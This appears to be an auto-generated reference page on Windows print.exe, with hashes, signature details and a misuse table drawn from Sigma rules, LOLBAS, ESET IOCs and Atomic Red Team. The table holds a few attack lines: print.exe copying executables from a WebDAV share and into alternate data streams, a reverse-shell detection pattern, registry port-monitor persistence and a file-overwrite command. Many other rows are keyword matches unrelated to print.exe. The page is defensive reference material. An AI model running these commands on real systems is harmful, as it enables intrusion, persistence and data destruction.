print.exe
- File Path:
C:\Windows\system32\print.exe
- Description: Print Utility
Hashes
Type | Hash |
---|---|
MD5 | 63E11431499B9603D21BA075543CD415 |
SHA1 | 38FC357A66EF90D84FA07509DFD9071B54EB345D |
SHA256 | 388D6761E678C66EEDA7085A05E10B13ABF88F855B753300C0F9B0D94DDB4DB0 |
SHA384 | 48540D170C7BB0ACEA8A706705AC77492886CAA3391D09545E585ECFA3E7A0491DBDA215778C9F9C2F6FE43B6C13BE42 |
SHA512 | 997F4CD774102FC867A7BD4C5851C13E6C160323937A31EF7678234F47EFA19E9AF492D13A37E294DF20144F8DAE6A7A7D62E0134CF0E2536FADFCCC5A4453A6 |
SSDEEP | 192:Ks0CHkYa05foZiaDsqBNCh7MtKd+46Pv+DxlzezB/HQYjkGpnX4dhiJmVWzUW:vXbjaNNtkdU6xBezB/UQnXCVWzUW |
IMP | D67C73847BD1DC0D9109BA544AD6C11D |
PESHA1 | 50A77BD35AC84ECAC14CC2E25B7735F9BB89A11D |
PE256 | 98FD7307A07AD66A5718C153284BEF7A46CED530C146EEE728D61402540AE49C |
Runtime Data
Usage (stdout):
Prints a text file.
PRINT [/D:device] [[drive:][path]filename[...]]
/D:device Specifies a print device.
Loaded Modules:
Path |
---|
C:\Windows\System32\KERNEL32.DLL |
C:\Windows\System32\KERNELBASE.dll |
C:\Windows\SYSTEM32\ntdll.dll |
C:\Windows\system32\print.exe |
Signature
- Status: Signature verified.
- Serial:
3300000266BD1580EFA75CD6D3000000000266
- Thumbprint:
A4341B9FD50FB9964283220A36A1EF6F6FAA7840
- Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: Print.Exe.MUI
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.19041.1 (WinBuild.160101.0800)
- Product Version: 10.0.19041.1
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
- Machine Type: 64-bit
File Scan
- VirusTotal Detections: 0/75
- VirusTotal Link: https://www.virustotal.com/gui/file/388d6761e678c66eeda7085a05e10b13abf88f855b753300c0f9b0d94ddb4db0/detection
Possible Misuse
The following table contains possible examples of print.exe
being misused. While print.exe
is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
Source | Source File | Example | License |
---|---|---|---|
sigma | av_printernightmare_cve_2021_34527.yml | description: Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 . |
DRL 1.0 |
sigma | lnx_shell_susp_rev_shells.yml | - ';while(cmd=c.gets);IO.popen(cmd,"r"){\|io\|c.print' |
DRL 1.0 |
sigma | zeek_dce_rpc_printnightmare_print_driver_install.yml | title: Possible PrintNightmare Print Driver Install |
DRL 1.0 |
sigma | zeek_dce_rpc_printnightmare_print_driver_install.yml | Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). |
DRL 1.0 |
sigma | zeek_dce_rpc_printnightmare_print_driver_install.yml | The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy. |
DRL 1.0 |
sigma | win_exploit_cve_2021_1675_printspooler.yml | title: Possible CVE-2021-1675 Print Spooler Exploitation |
DRL 1.0 |
sigma | win_exploit_cve_2021_1675_printspooler.yml | description: Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675 |
DRL 1.0 |
sigma | win_exploit_cve_2021_1675_printspooler.yml | - 'The print spooler failed to load a plug-in module' |
DRL 1.0 |
sigma | win_exploit_cve_2021_1675_printspooler_operational.yml | title: CVE-2021-1675 Print Spooler Exploitation |
DRL 1.0 |
sigma | win_exploit_cve_2021_1675_printspooler_operational.yml | description: Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 |
DRL 1.0 |
sigma | win_exploit_cve_2021_1675_printspooler_security.yml | title: CVE-2021-1675 Print Spooler Exploitation IPC Access |
DRL 1.0 |
sigma | win_exploit_cve_2021_1675_printspooler_security.yml | description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527 |
DRL 1.0 |
sigma | file_event_win_cve_2021_1675_printspooler.yml | title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern |
DRL 1.0 |
sigma | file_event_win_cve_2021_1675_printspooler.yml | description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675 |
DRL 1.0 |
sigma | proc_creation_win_susp_print.yml | title: Abusing Print Executable |
DRL 1.0 |
sigma | proc_creation_win_susp_print.yml | description: Attackers can use print.exe for remote file copy |
DRL 1.0 |
sigma | proc_creation_win_susp_print.yml | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Print.yml |
DRL 1.0 |
sigma | proc_creation_win_susp_print.yml | - \print.exe |
DRL 1.0 |
sigma | proc_creation_win_susp_print.yml | - print |
DRL 1.0 |
sigma | proc_creation_win_susp_print.yml | - print.exe |
DRL 1.0 |
sigma | proc_creation_win_susp_spoolsv_child_processes.yml | description: Detects suspicious print spool service (spoolsv.exe) child processes. |
DRL 1.0 |
sigma | proc_creation_win_susp_spoolsv_child_processes.yml | - https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md |
DRL 1.0 |
sigma | registry_event_add_port_monitor.yml | TargetObject\|startswith: 'HKLM\System\CurrentControlSet\Control\Print\Monitors\' |
DRL 1.0 |
sigma | registry_event_add_port_monitor.yml | TargetObject\|contains: '\System\CurrentControlSet\Control\Print\Monitors\CutePDF Writer Monitor v4.0\Driver' |
DRL 1.0 |
sigma | registry_event_asep_reg_keys_modification.yml | - '\Print\Providers' |
DRL 1.0 |
sigma | registry_event_asep_reg_keys_modification.yml | - '\Print\Monitors' |
DRL 1.0 |
sigma | registry_event_asep_reg_keys_modification_currentcontrolset.yml | - '\Print\Providers' |
DRL 1.0 |
sigma | registry_event_asep_reg_keys_modification_currentcontrolset.yml | - '\Print\Monitors' |
DRL 1.0 |
sigma | registry_event_asep_reg_keys_modification_currentcontrolset.yml | TargetObject\|contains: '\Print\Monitors\CutePDF Writer Monitor' |
DRL 1.0 |
sigma | registry_event_mimikatz_printernightmare.yml | - '\Control\Print\Environments\Windows x64\Drivers\Version-3\QMS 810\' |
DRL 1.0 |
sigma | registry_event_mimikatz_printernightmare.yml | - '\Control\Print\Environments\Windows x64\Drivers\Version-3\mimikatz' |
DRL 1.0 |
sigma | registry_event_mimikatz_printernightmare.yml | - '\Control\Print\Environments\Windows' |
DRL 1.0 |
sigma | registry_event_mimikatz_printernightmare.yml | - '\Control\Print\Environments' |
DRL 1.0 |
sigma | registry_event_mimikatz_printernightmare.yml | - '\CurrentVersion\Print\Printers' |
DRL 1.0 |
sigma | registry_event_susp_printer_driver.yml | - '\Control\Print\Environments\Windows x64\Drivers' |
DRL 1.0 |
LOLBAS | Print.yml | Name: Print.exe |
|
LOLBAS | Print.yml | - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe |
|
LOLBAS | Print.yml | - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe |
|
LOLBAS | Print.yml | - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe |
|
LOLBAS | Print.yml | - Path: C:\Windows\System32\print.exe |
|
LOLBAS | Print.yml | - Path: C:\Windows\SysWOW64\print.exe |
|
LOLBAS | Print.yml | - IOC: Print.exe retrieving files from internet |
|
LOLBAS | Print.yml | - IOC: Print.exe creating executable files on disk |
|
LOLBAS | Mshtml.yml | Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box). |
|
malware-ioc | deprimon | https://www.welivesecurity.com/2019/11/21/deprimon-default-print-monitor-malicious-downloader/[WeLiveSecurity]. |
© ESET 2014-2018 |
malware-ioc | deprimon | [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Windows Default Print Monitor] |
© ESET 2014-2018 |
malware-ioc | nouns.txt | print |
© ESET 2014-2018 |
malware-ioc | mumblehard | under the Perl interpreter. The following command ran as root will print the |
© ESET 2014-2018 |
malware-ioc | mumblehard | ps -ef \| grep -e ' httpd$' -e ' mail$' -e ' init$' \| awk '{print $2}' \| xargs -I '{}' ls -l '/proc/{}/exe' \| grep perl \| cut -d/ -f 3 |
© ESET 2014-2018 |
malware-ioc | 2020_Q4 | HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\BcastDVRUserService_6d67d\Driver |
© ESET 2014-2018 |
malware-ioc | 2020_Q4 | HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\BcastDVRUserService_3c628o\Driver |
© ESET 2014-2018 |
malware-ioc | 2020_Q4 | HKLM\SOFTWARE\Microsoft\Print\Components\Spooler-PPC\{94E5H6D48A-P895-85E1-54DD-080636B11A03} |
© ESET 2014-2018 |
malware-ioc | 2020_Q4 | HKLM\SOFTWARE\Microsoft\Print\Components\Spooler-PPC\{38C8D238Q-923C-D782-9B8J-829263CD85C9} |
© ESET 2014-2018 |
malware-ioc | vf_ioc_linux_rakos.py | print("Suspected PID: {0:8s} {1:<16}:{2:>5} {3:<16}:{4:>5} {5:<15s} {6:>17s}/{7:<5d}\n".format(proto, saddr, sport, daddr, dport, state, task.comm, task.pid)) |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_str_ : "; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "$f : crypted, skip\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print $fc. "\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_ssh: \n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd1: '$sd[1]':'$sd[2]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc1: '$sc[1]':'$sc[2]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd1a: file:'$sd[4]'; hash:'$sd[15]'; cvs:'$sd[1]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd2: '$sd[1]':'$sd[2]':'$sd[3]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc4: '$sc[1]':'$sc[0]'\n" if @sc and f $sc[1]; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd4: '$sd[0]':'$sd[1]':'$sd[2]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd5: " . join( '\|', @sd ) . "\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd6: '$sd[2]':'$sd[0]'\nmod_sshc6: '$sc[0]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd7: '$sd[0]':'$sd[4]'\nmod_sshc7: '$sc[0]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd8: '$sd[1]':'$sd[2]'\nmod_sshc8: '$sc[1]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | if (@sd) { print "mod_sshd12: GET, no params"; ssh_ls() } |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd14: hash:'$sd[3]':'$sd[4]':'$sd[2]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc14: hash:'$sd[3]':'$sd[4]':'$sd[2]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | else { print "mod_sshd14: unknown hash; fpass:'$sd[1]';'$sd[3]'\n" } |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod14p: $d\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd15: '$sd[0]':'$sd[2]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc15: '$sc[38]':'$sc[0]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd16: '$sd[0]':'$sd[1]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc16: '$sc[1]':'$sc[0]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd17: crypt:'$sd[2]':'$sd[0]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc17: '$sc[0]':'$sc[1]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd17: client_string:'$q[1]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd18: md5:'$sd[3]':'$sd[0]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc18: md5:'$sc[3]':'$sc[0]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd19: '$sd[0]':'$sd[1]' url:'$sd[5] '$sd[4]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd20: '$sd[0]':'$sd[1]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc20: '$sc[0]':'$sc[1]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd21: '$sd[0]' mod_sshc21: '$sc[0]':'$sc[1]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc22: '$sd[0]':'$sd[1]':'$sd[2]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd23: '$sd[2]':'$sd[0]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc23: '$sc[0]':'$sc[1]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd24: '$sd[0]':'$sd[17]':'$sd[18]:$sd[20]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc24: '$sc[1]':'$sc[0]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd25: '$sd[2]':'$sd[0]' mod_sshc25: '$sc[0]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd27: '$sd[0]':'$sd[2]':'$sd[1]'\nmod_sshc27: '$sc[0]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd31: hash:'$sd[2]':'$sd[1]':'$sd[0]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd32: md5:'$sd1[0]:'$sd[0]':'$sc[0]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd33: '$sd[0]':'$sd[1]':'$sc[0]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print $q. "\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd36: md5:'$sd[0]':'$sc[0]'; '$sd[1]':'$sc[1]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd37: md5:'$sd[0]'; '$sd[1]':'$sd[3]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | while (<$fn>) { chomp; print $_ ^ "\x14" x length $_ } |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_ssh41_cstr: " . join( '\|', sort keys %ostr ) . "\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd41: '$sd[1]' '$sd[0]', crypted\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc41: '$sc[1]' '$sc[0]', crypted\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd42: detected; log_useragent:passwd_file:passwd\n" if @sd; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshc42: detected\n" if @sc; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd44: pass:'$sd[1]' '$sd[0]', '$sd[2]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | if ( $sc[0] ) { print "mod_sshc44: '$sc[0]' '$sc[13]'\n"; ssh_ls( $sd[0] ) } |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd45: pass:'$sd[1]' host:'$sd[0]', '$sd[2]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | if ( $sc[0] ) { print "mod_sshc45: host:'$sc[0]' '$sc[1]'\n"; ssh_ls() } |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd46: crypt:'$sc[1]' v1:'$sd[1]' v2:'$sd[2]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_sshd47: pass:'$sd[0]' '$sd[1]', '$sd[2]'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | if (@sc) { print "mod_sshc47: host:'$sc[0]' '$sc[-1]'\n"; ssh_ls( $sc[0] ) } |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | for (@sd) { print "mod_md5_sshd: '$_'\n" } |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | for (@sc) { print "mod_md5_ssh: '$_'\n" } |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_md5_static_ssl: $static_ssl\n" if $static_ssl; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_hack_strd: possible hacked, " . join( "\|", @sd ) . "\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_hack_strc: possible hacked, " . join( "\|", @sc ) . "\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | for (@sd) { print "mod_md5_sshd1: '$_'\n" } |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_str_sshd_str: '" . join( "':'", keys %ostr ) . "'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | print "mod_str_sshd_str1: '" . join( "':'", keys %ostr ) . "'\n"; |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | if (@sd) { print "sshd_str: " . join( '\|', @sd ) . "\n" } |
© ESET 2014-2018 |
malware-ioc | windigo_signatures.pl | if (@sc) { print "sshc_str: " . join( '\|', @sc ) . "\n" } |
© ESET 2014-2018 |
malware-ioc | turla | ** ResultQueue::print``{:.highlight .language-cmhg} |
© ESET 2014-2018 |
malware-ioc | turla | ** TaskQueue::print``{:.highlight .language-cmhg} |
© ESET 2014-2018 |
malware-ioc | windigo | print the dynamic section of the ELF header. Anything NEEDED (type 1) other |
© ESET 2014-2018 |
malware-ioc | windigo | OpenSSH version 6.7 or earlier. A clean server will print |
© ESET 2014-2018 |
malware-ioc | windigo | to stderr but an infected server will only print the usage (note the missing |
© ESET 2014-2018 |
malware-ioc | windigo | yields no output if one is not infected and would print a filename if one is. |
© ESET 2014-2018 |
malware-ioc | windigo | ps -ef \| grep crond \| grep -v grep \| awk '{print $2}' |
© ESET 2014-2018 |
malware-ioc | winnti_group | HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\PrintFiiterPipelineSvc\Driver = “DEment.dll” |
© ESET 2014-2018 |
malware-ioc | winnti_group | HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\lltdsvc1\Driver = “EntAppsvc.dll” |
© ESET 2014-2018 |
malware-ioc | winnti_group | HKLM\SOFTWARE\Microsoft\Print\Components\DC20FD7E-4B1B-4B88-8172-61F0BED7D9E8 |
© ESET 2014-2018 |
malware-ioc | winnti_group | HKLM\SOFTWARE\Microsoft\Print\Components\A66F35-4164-45FF-9CB4-69ACAA10E52D |
© ESET 2014-2018 |
atomic-red-team | index.md | - T1547.012 Print Processors CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - T1547.012 Print Processors CONTRIBUTE A TEST | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | matrix.md | | | | Outlook Forms CONTRIBUTE A TEST | Print Processors CONTRIBUTE A TEST | Impair Defenses CONTRIBUTE A TEST | | | | | | | | | MIT License. © 2018 Red Canary |
atomic-red-team | matrix.md | | | | Print Processors CONTRIBUTE A TEST | Services File Permissions Weakness CONTRIBUTE A TEST | Masquerade Task or Service | | | | | | | | | MIT License. © 2018 Red Canary |
atomic-red-team | windows-matrix.md | | | | Password Filter DLL | Print Processors CONTRIBUTE A TEST | Indicator Removal from Tools CONTRIBUTE A TEST | | | | | | | | | MIT License. © 2018 Red Canary |
atomic-red-team | windows-matrix.md | | | | Print Processors CONTRIBUTE A TEST | Security Support Provider | Mark-of-the-Web Bypass | | | | | | | | | MIT License. © 2018 Red Canary |
atomic-red-team | T1016.md | if [ -x “$(command -v netstat)” ]; then netstat -ant | awk ‘{print $NF}’ | grep -v ‘[a-z]’ | sort | uniq -c; else echo “netstat is missing from the machine. skipping…”; fi; | MIT License. © 2018 Red Canary |
atomic-red-team | T1018.md | Upon successful execution, cmd.exe will execute net.exe view and display results of local systems on the network that have file and print sharing enabled. |
MIT License. © 2018 Red Canary |
atomic-red-team | T1018.md | adidnsdump -u #{user_name} -p #{acct_pass} –print-zones #{host_name} | MIT License. © 2018 Red Canary |
atomic-red-team | T1027.004.md | Upon execution, the exe will print ‘T1027.004 Dynamic Compile’. | MIT License. © 2018 Red Canary |
atomic-red-team | T1036.006.md | 1. echo ‘#!/bin/bash\necho “print "hello, world!"” | /usr/bin/python\nexit’ > execute.txt && chmod +x execute.txt | MIT License. © 2018 Red Canary |
atomic-red-team | T1059.003.md | - Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing | MIT License. © 2018 Red Canary |
atomic-red-team | T1059.003.md | ## Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing | MIT License. © 2018 Red Canary |
atomic-red-team | T1059.003.md | It is designed to mimic BlackByte ransomware’s print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. | MIT License. © 2018 Red Canary |
atomic-red-team | T1059.003.md | | max_to_print | The maximum number of Wordpad windows the test will open/print. | String | 75| | MIT License. © 2018 Red Canary |
atomic-red-team | T1059.003.md | ##### Description: File to print must exist on disk at specified location (#{file_to_print}) | MIT License. © 2018 Red Canary |
atomic-red-team | T1082.md | in order simply print the recon results to the screen as opposed to exfiltrating them. Script. | MIT License. © 2018 Red Canary |
atomic-red-team | T1083.md | cd $HOME && find . -print | sed -e ‘s;[^/]*/;|;g;s;|; |;g’ > #{output_file} | MIT License. © 2018 Red Canary |
atomic-red-team | T1110.003.md | This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like “[*] username:password”, whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray. | MIT License. © 2018 Red Canary |
atomic-red-team | T1127.001.md | Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print “Hello From a Code Fragment” and “Hello From a Class.” to the screen. | MIT License. © 2018 Red Canary |
atomic-red-team | T1127.001.md | Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print “Hello from a Visual Basic inline task!” to the screen. | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | | message | Message to print to the screen | String | Hello from Atomic Red Team test T1140!| | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | ENCODED=$(python3 -c ‘import base64;enc=base64.b64encode(“#{message}”.encode());print(enc.decode())’) | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | python3 -c “import base64;dec=base64.b64decode("$ENCODED");print(dec.decode())” | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | python3 -c “import base64 as d;dec=d.b64decode("$ENCODED");print(dec.decode())” | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | python3 -c “from base64 import b64decode;dec=b64decode("$ENCODED");print(dec.decode())” | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | python3 -c “from base64 import b64decode as d;dec=d("$ENCODED");print(dec.decode())” | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | echo $ENCODED | python3 -c “import base64,sys;dec=base64.b64decode(sys.stdin.read());print(dec.decode())” | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | echo $ENCODED > #{encoded_file} && python3 -c “import base64;dec=base64.b64decode(open(‘#{encoded_file}’).read());print(dec.decode())” | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | ENCODED=$(perl -e “use MIME::Base64;print(encode_base64(‘#{message}’));”) | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | perl -le “use MIME::Base64;print(decode_base64(‘$ENCODED’));” | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | echo $ENCODED | perl -le ‘use MIME::Base64;print(decode_base64( |
MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | echo $ENCODED > #{encoded_file} && perl -le ‘use MIME::Base64;open($f,”<”,”#{encoded_file}”);print(decode_base64(<$f>));’ | MIT License. © 2018 Red Canary |
atomic-red-team | T1485.md | dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk ‘{print $5}’) iflag=count_bytes | MIT License. © 2018 Red Canary |
atomic-red-team | T1489.md | Stops a specified service using the net.exe command. Upon execution, if the service was running “The Print Spooler service was stopped successfully.” | MIT License. © 2018 Red Canary |
atomic-red-team | T1489.md | will be displayed. If the service was not running, “The Print Spooler service is not started.” will be displayed and it can be | MIT License. © 2018 Red Canary |
atomic-red-team | T1518.md | /usr/libexec/PlistBuddy -c “print :CFBundleShortVersionString” /Applications/Safari.app/Contents/Info.plist | MIT License. © 2018 Red Canary |
atomic-red-team | T1518.md | /usr/libexec/PlistBuddy -c “print :CFBundleVersion” /Applications/Safari.app/Contents/Info.plist | MIT License. © 2018 Red Canary |
atomic-red-team | T1546.001.md | * HKEY_CLASSES_ROOT\txtfile\shell\print\command |
MIT License. © 2018 Red Canary |
atomic-red-team | T1547.010.md | <blockquote>Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors . |
MIT License. © 2018 Red Canary |
atomic-red-team | T1547.010.md | reg add “hklm\system\currentcontrolset\control\print\monitors\ART” /v “Atomic Red Team” /d “#{monitor_dll}” /t REG_SZ | MIT License. © 2018 Red Canary |
atomic-red-team | T1547.010.md | reg delete “hklm\system\currentcontrolset\control\print\monitors\ART” /f >nul 2>&1 | MIT License. © 2018 Red Canary |
atomic-red-team | T1562.004.md | Print the last 10 lines of the Uncomplicated Firewall (UFW) log file | MIT License. © 2018 Red Canary |
atomic-red-team | T1564.004.md | print /D:#{path}\file.txt:autoruns.exe #{path}\Autoruns.exe | MIT License. © 2018 Red Canary |
signature-base | apt_backdoor_ssh_python.yar | $s1 = “print ‘[-] (Failed to load moduli – gex will be unsupported.)’” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_backdoor_ssh_python.yar | $s2 = “print ‘[-] Listen/bind/accept failed: ‘ + str(e)” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_backdoor_ssh_python.yar | $s4 = “print ‘[-] SSH negotiation failed.’” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | $x2 = “print "Gimme hex: ";” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | $s3 = “print "$hex in decimal=$dec\n\n";” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | $s2 = “print "ERROR: the filename or hex representation needs to be one argument try using \"’s\n";” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | $s5 = “print hextoIP($ARGV[0]);” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | $s2 = “print »out, "%s%04x " % (lead,i),” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | $s3 = “print »out, "%02X" % ord(x[i+j]),” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | $s4 = “print »out, sane(x[i:i+16])” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | $s1 = “print "[+] Connecting to %s:%s" % (self.params.dst[‘ip’], self.params.dst[‘port’])” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | $s6 = “print "[-] keyboard interrupt before response received"” fullword ascii | CC BY-NC 4.0 |
